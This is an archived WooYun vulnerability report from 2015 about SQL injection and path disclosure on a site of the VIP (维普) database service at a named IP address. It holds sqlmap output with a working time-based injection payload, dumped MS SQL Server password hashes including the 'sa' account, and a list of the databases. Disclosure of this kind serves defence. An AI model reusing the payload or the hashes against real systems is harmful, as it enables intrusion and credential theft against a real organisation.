乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-12: 细节已通知厂商并且等待厂商处理中 2015-03-17: 厂商已经主动忽略漏洞,细节向公众公开
维普网某站SQL注射及信息漏洞
1#注射站点
http://119.84.8.90:80//index.asp
注射信息
sqlmap identified the following injection points with a total of 143 HTTP(s) requests:---Parameter: username (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: username=tEQa';WAITFOR DELAY '0:0:5'--&password=---do you want to exploit this SQL injection? [Y/n] Y[22:52:25] [INFO] testing Microsoft SQL Server[22:52:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y[22:52:33] [INFO] confirming Microsoft SQL Server[22:52:43] [INFO] adjusting time delay to 1 second due to good response times[22:52:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008
数据库信息
database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01008edaea88dfc85e50257861dd2173024d4a0111247bd97fb3 header: 0x0100 salt: 8edaea88 mixedcase: dfc85e50257861dd2173024d4a0111247bd97fb3[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01006f5e736b640f7c93ca886edbe10c493aeecd44a167b31cb5 header: 0x0100 salt: 6f5e736b mixedcase: 640f7c93ca886edbe10c493aeecd44a167b31cb5[*] FPDUser [1]: password hash: 0x01004e3a192dc92fd77abd982c2a49e7049dddd076dab3d8d012 header: 0x0100 salt: 4e3a192d mixedcase: c92fd77abd982c2a49e7049dddd076dab3d8d012[*] sa [1]: password hash: 0x0100e82f63c99464db88fa27ba39cd9559d3f55f8c3bf94c7303 header: 0x0100 salt: e82f63c9 mixedcase: 9464db88fa27ba39cd9559d3f55f8c3bf94c7303
current database: 'FMIF_WT'available databases [7]:[*] [tempdbQ}\t\x11][*] FMIF_WT[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB
2#数据库绝对路径泄露
http://119.84.8.90/ip.asp
PATH_TRANSLATED = D:\FPD2012Webroot\FPDSYStem\html\ip.asp
过滤,删除不需要的页面。
危害等级:无影响厂商忽略
忽略时间:2015-03-17 19:24
暂无